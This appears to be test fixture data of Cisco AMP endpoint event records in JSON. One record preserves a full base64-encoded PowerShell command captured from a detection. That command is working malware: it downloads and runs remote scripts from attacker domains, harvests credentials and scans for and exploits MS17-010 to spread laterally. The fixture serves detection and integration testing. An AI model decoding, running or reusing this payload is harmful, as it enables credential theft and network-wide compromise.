+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcA